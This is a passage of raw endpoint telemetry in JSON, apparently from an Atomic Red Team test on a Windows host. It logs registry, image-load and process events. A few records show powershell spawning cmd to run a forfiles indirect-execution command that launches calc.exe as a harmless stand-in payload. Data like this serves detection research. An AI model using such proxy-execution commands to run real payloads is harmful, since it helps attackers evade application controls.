- "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000305D2", - "registry_value": "W32:00000000000305D2", - "timestamp": 131883574019730000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "process", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "subtype": "terminate", - "timestamp": 131883574019820000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "registry", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", - 
"registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", - "registry_value": "pcalua.exe", - "timestamp": 131883574019820000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883574019820000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", - "registry_value": "cbjrefuryy.rkr", - "timestamp": 131883574019920000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883574019920000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883574020000000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883574020000000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883574020000000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "process", - "pid": 3920, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883574020040000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": 
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 5532, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883574020110000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-00108F885701}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5532, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574020100000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-00108F885701}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5532, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574020100000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-00108F885701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5532, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574020100000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-00108F885701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5532, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574020100000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-00108F885701}" - }, - { - "event_type": "file", - "file_name": "PCALUA.EXE-5EB8CBC1.pf", - "file_path": "C:\\Windows\\Prefetch\\PCALUA.EXE-5EB8CBC1.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883574020100000, - "unique_pid": 
"{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5532, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574020100000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-00108F885701}" - }, - { - "event_type": "process", - "pid": 5532, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883574020180000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-00108F885701}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000305D2", - "registry_value": "W32:00000000000305D2", - "timestamp": 131883574020360000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000305D2", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000305D2\\VirtualDesktop", - "registry_value": "VirtualDesktop", - "timestamp": 131883574020360000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"forfiles /p 
c:\\windows\\system32 /m notepad.exe /c calc.exe\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 5004, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883574020810000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5004, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574020810000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5004, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574020810000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5004, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574020810000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5004, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574020810000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5004, - 
"process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574020810000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}" - }, - { - "command_line": "forfiles /p c:\\windows\\system32 /m notepad.exe /c calc.exe", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4500, - "ppid": 5004, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "subtype": "create", - "timestamp": 131883574020900000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}", - "unique_ppid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574020990016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883574020990016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": 
"Software Publishing", - "timestamp": 131883574020990016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883574020990016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574020990016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574020990016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "forfiles.exe", - "image_path": "C:\\Windows\\System32\\forfiles.exe", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574020990016, - "unique_pid": 
"{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - 
}, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": 
"C:\\Windows\\System32\\user32.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "image_load", - "image_name": "version.dll", - "image_path": "C:\\Windows\\System32\\version.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 4500, - 
"process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574021160000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574021160000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574021160000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574021160000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 